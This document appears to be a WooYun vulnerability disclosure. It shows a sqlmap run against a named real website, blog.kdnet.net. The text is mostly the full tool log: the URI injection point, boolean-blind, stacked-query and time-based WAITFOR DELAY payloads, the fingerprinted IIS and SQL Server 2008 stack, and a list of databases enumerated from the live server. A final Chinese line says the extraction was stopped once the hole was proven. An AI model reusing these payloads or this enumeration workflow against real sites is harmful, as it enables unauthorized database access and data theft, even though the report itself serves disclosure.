WooYun.org

sqlmap -u http://blog.kdnet.net/boke.asp?id5815402*.html --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 13:29:05
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q]
[13:29:06] [INFO] resuming back-end DBMS 'microsoft sql server'
[13:29:06] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://blog.kdnet.net:80/boke.asp?id5815402' AND 4325=4325 AND 'rfYs'='rfYs.html
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: http://blog.kdnet.net:80/boke.asp?id5815402'; WAITFOR DELAY '0:0:5'--.html
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: http://blog.kdnet.net:80/boke.asp?id5815402' WAITFOR DELAY '0:0:5'--.html
---
[13:29:08] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
[13:29:08] [INFO] fetching database names
[13:29:08] [INFO] fetching number of databases
[13:29:08] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[13:29:08] [INFO] retrieved:
[13:29:17] [WARNING] time-based comparison requires larger statistical model, please wait...........................
[13:29:48] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[13:29:49] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[13:29:50] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[13:29:50] [ERROR] unable to retrieve the number of databases
[13:29:50] [INFO] retrieved:
[13:29:53] [INFO] heuristics detected web page charset 'GB2312'
sqlmap got a 302 redirect to 'http://blog.kdnet.net:80/BokeDescription.asp'. Do you want to follow? [Y/n] n
[13:29:56] [WARNING] reflective value(s) found and filtering out
dvbook
[13:30:40] [INFO] retrieved: master
[13:31:19] [INFO] retrieved: tempdb
[13:32:02] [INFO] retrieved: model
[13:32:39] [INFO] retrieved: msdb
[13:33:07] [INFO] retrieved: ReportServer
[13:34:32] [INFO] retrieved: ReportServerTempDB
[13:36:44] [INFO] retrieved: bbs1
[13:37:10] [INFO] retrieved: bbs2
[13:37:35] [INFO] retrieved: bbs3
[13:38:00] [INFO] retrieved: bbs4
[13:38:24] [INFO] retrieved: bbs5
[13:38:49] [INFO] retrieved: dvbook
[13:39:34] [INFO] retrieved: bbs6
[13:40:00] [INFO] retrieved: bbs7
依然在继续 只是为了证明有漏洞就不继续了